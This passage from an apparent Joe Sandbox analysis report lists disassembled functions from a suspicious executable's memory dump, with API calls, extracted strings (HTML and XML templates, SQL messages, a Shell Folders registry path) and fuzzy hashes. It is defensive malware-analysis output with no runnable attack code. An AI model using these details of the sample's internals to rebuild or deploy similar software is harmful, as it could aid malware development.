                                                                                                              • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                              • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$memset
                                                                                                              • String ID: gj
                                                                                                              • API String ID: 438689982-4203073231
                                                                                                              • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                              • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                              • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                              • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                              Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy
                                                                                                              • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                              • API String ID: 3510742995-2446657581
                                                                                                              • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                              • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                              • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                              • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                              Function 00405A0E Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                              • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                              • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                              • memset.MSVCRT ref: 00405ABB
                                                                                                              • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                              • SetFocus.USER32(?), ref: 00405B76
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$FocusItemmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 4281309102-0
                                                                                                              • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                              • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                              • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                              • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                              Function 0040FA33 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _snwprintfwcscat
                                                                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                              • API String ID: 384018552-4153097237
                                                                                                              • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                              • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                              • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                              • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                              Function 0040D7A7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                              • String ID: 0$6
                                                                                                              • API String ID: 2029023288-3849865405
                                                                                                              • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                              • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                              • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                              • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                              Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                              • memset.MSVCRT ref: 00405455
                                                                                                              • memset.MSVCRT ref: 0040546C
                                                                                                              • memset.MSVCRT ref: 00405483
                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$memcpy$ErrorLast
                                                                                                              • String ID: 6$\
                                                                                                              • API String ID: 404372293-1284684873
                                                                                                              • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                              • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                              • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                              • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                              Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                              • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                              • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                              • wcscat.MSVCRT ref: 0040A0E6
                                                                                                              • wcscat.MSVCRT ref: 0040A0F5
                                                                                                              • wcscpy.MSVCRT ref: 0040A107
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 1331804452-0
                                                                                                              • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                              • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                              • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                              • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                              Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                              • String ID: advapi32.dll
                                                                                                              • API String ID: 2012295524-4050573280
                                                                                                              • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                              • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                              • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                              • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                              Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                              • <%s>, xrefs: 004100A6
                                                                                                              • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$_snwprintf
                                                                                                              • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                              • API String ID: 3473751417-2880344631
                                                                                                              • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                              • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                              • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                              • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                              Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: wcscat$_snwprintfmemset
                                                                                                              • String ID: %2.2X
                                                                                                              • API String ID: 2521778956-791839006
                                                                                                              • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                              • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                              • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                              • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                              Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _snwprintfwcscpy
                                                                                                              • String ID: dialog_%d$general$menu_%d$strings
                                                                                                              • API String ID: 999028693-502967061
                                                                                                              • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                              • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                              • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                              • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                              Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • strlen.MSVCRT ref: 00408DFA
                                                                                                                • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                              • memset.MSVCRT ref: 00408E46
                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                              • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                              • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$memsetstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 2350177629-0
                                                                                                              • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                              • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                              • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                              • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                              Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset
                                                                                                              • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                              • API String ID: 2221118986-1606337402
                                                                                                              • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                              • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                              • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                              • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                              Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                              • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                              • memset.MSVCRT ref: 00408FD4
                                                                                                              • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                              • memset.MSVCRT ref: 00409042
                                                                                                              • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 265355444-0
                                                                                                              • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                              • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                              • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                              • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                              Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                              • memset.MSVCRT ref: 0040C439
                                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                              • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                              • memset.MSVCRT ref: 0040C4D0
                                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                              • String ID:
                                                                                                              • API String ID: 4131475296-0
                                                                                                              • Opcode ID: f8fc55ba245d1c9f6a3ba6cb2a4711690556c3657263a09b0baeb8372baa9e99
                                                                                                              • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                              • Opcode Fuzzy Hash: f8fc55ba245d1c9f6a3ba6cb2a4711690556c3657263a09b0baeb8372baa9e99
                                                                                                              • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                              Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004116FF
                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
